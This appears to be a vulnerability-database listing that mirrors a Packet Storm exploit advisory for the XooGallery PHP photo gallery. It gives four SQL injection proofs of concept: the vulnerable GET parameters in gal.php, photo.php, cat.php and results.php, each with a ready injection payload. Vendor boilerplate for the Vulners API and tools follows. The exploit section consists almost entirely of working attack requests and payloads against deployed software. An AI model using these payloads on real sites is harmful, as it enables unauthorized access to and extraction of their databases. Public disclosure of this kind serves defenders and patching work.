Lucene search
K

XooGallery SQL Injection

🗓️ 27 Mar 2019 00:00:00Reported by Ahmet Umit BayramType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

XooGallery SQL Injection, Multiple vulnerabilities found in gal.php, photo.php, cat.php, and results.ph

Code
`# Exploit Title: XooGallery - Multiple SQL Injections  
# Date: 26.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://xooscripts.com/product/html5-php-photo-gallery.html  
# Demo Site: http://xooscripts.com/demos/xoogallery/  
# Version: Lastest  
# Tested on: Kali Linux  
# CVE: N/A  
  
----- PoC 1: SQLi -----  
  
Request: http://localhost/[PATH]/gal.php?gal_id=1  
Vulnerable Parameter: gal_id (GET)  
Payload: gal_id=29' AND 2692=2692 AND 'WCFf'='WCFf  
  
----- PoC 2: SQLi -----  
  
Request: http://localhost/[PATH]/photo.php?photo_id=1  
Vulnerable Parameter: photo_id (GET)  
Payload: photo_id=1' AND 5479=5479#  
  
----- PoC 3: SQLi -----  
  
Request: http://localhost/[PATH]/cat.php?cat_id=1  
Vulnerable Parameter: cat_id (GET)  
Payload: cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH  
  
  
----- PoC 4: SQLi -----  
  
Request: http://localhost/[PATH]/results.php?p=1  
Vulnerable Parameter: p (GET)  
Payload: p=-8412' OR 2597=2597#  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Mar 2019 00:00Current
0.9Low risk
Vulners AI Score0.9
28